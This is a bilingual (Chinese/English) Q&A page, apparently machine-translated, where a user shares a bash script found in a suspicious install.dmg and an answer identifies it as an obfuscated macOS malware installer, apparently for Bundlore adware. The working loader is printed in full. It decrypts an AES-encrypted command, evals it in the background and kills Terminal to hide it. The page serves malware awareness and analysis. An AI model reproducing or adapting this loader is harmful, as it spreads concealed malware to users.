问题描述
#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
我从一个自动下载的可疑的install.dmg文件中获得了此文件.我显然没有执行此操作,所以我想我可能会问你们这里的人.
I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.
推荐答案
简短答案:不要不要运行它.除非有兴趣将其分析为恶意软件,否则请用火杀死它.
Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.
这是一个模糊的恶意软件安装脚本.该脚本本身非常通用,但是在同一目录中有另一个(加密的)文件是真正的有效负载,几乎可以肯定是恶意软件.实际上,这看起来与我前一段时间看过的几乎完全一样.这是VirusTotal扫描结果,.
It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection.
说明:如果这与我之前看过的匹配,则该脚本旁边还有一个名为"2P1zsqQ"的文件.该文件名用作将 commandArgs
字符串解密为shell命令字符串的密码,该命令包含与/tmp/< somethingrandom>解密2P1zsqQ文件本身(使用相同的密码)的指令.;/Qqsz1P2
,运行该(解密的)可执行文件,然后将其删除(此脚本会杀死Terminal应用程序,从而隐藏正在发生的事情).
Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs
string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2
, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).
BTW,此问题与一个类似的恶意软件有关安装脚本;也许是早期版本,混淆程度略低.
BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.
这篇关于此命令有多有害?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!